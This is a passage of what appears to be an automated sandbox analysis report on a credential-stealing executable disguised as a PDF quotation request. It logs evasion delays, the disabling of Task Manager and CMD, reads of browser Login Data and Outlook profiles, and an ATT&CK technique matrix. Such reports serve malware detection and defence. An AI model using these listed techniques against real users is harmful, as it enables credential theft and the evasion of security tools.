            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 597153Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 597046Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 596937Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 596828Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 596718Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 596609Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 596500Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 596390Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 596281Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 596171Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 596062Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 595953Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 595843Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 595625Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 595515Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 595296Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 595187Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 595078Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 594968Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 594859Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 594750Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 594640Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeWindow / User API: threadDelayed 947Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeWindow / User API: threadDelayed 8910Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsb13EA.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeAPI coverage: 3.9 %
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep count: 34 > 30Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -31359464925306218s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 5244Thread sleep count: 947 > 30Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -599890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 5244Thread sleep count: 8910 > 30Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -599672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -599562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -599453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -599343s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -599234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -599125s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -599015s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -598906s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -598796s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -598687s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -598578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -598468s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -598359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -598250s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -598140s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -598031s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -597922s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -597812s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -597703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -597593s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -597484s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -597374s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -597265s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -597153s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -597046s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -596937s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -596828s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -596718s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -596609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -596500s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -596390s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -596281s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -596171s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -596062s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -595953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -595843s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -595734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -595625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -595515s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -595406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -595296s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -595187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -595078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -594968s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -594859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -594750s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe TID: 4668Thread sleep time: -594640s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405846
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 0_2_00406398 FindFirstFileW,FindClose,0_2_00406398
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405846
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_004027FB FindFirstFileW,4_2_004027FB
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_00406398 FindFirstFileW,FindClose,4_2_00406398
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 599125Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 599015Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 598796Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 598578Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 598468Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 598250Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 598140Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 598031Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 597922Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 597812Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 597703Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 597593Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 597484Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 597374Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 597265Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 597153Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 597046Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 596937Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 596828Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 596718Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 596609Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 596500Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 596390Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 596281Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 596171Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 596062Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 595953Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 595843Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 595625Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 595515Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 595296Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 595187Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 595078Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 594968Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 594859Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 594750Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeThread delayed: delay time: 594640Jump to behavior
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3295585936.0000000004938000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3295585936.0000000004998000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3295585936.0000000004998000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW>
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-3761
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeAPI call chain: ExitProcess graph end nodegraph_0-3941
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeProcess created: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe "C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeQueries volume information: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 0_2_00406077 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406077
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeRegistry value created: DisableTaskMgr 1Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeRegistry value created: DisableCMD 1Jump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe PID: 616, type: MEMORYSTR
            Source: Yara matchFile source: 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe PID: 616, type: MEMORYSTR
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe PID: 616, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe PID: 616, type: MEMORYSTR
            Source: Yara matchFile source: 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe PID: 616, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            1
            Masquerading
            1
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Process Injection
            31
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection
            LSA Secrets2
            File and Directory Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information
            Cached Domain Credentials215
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
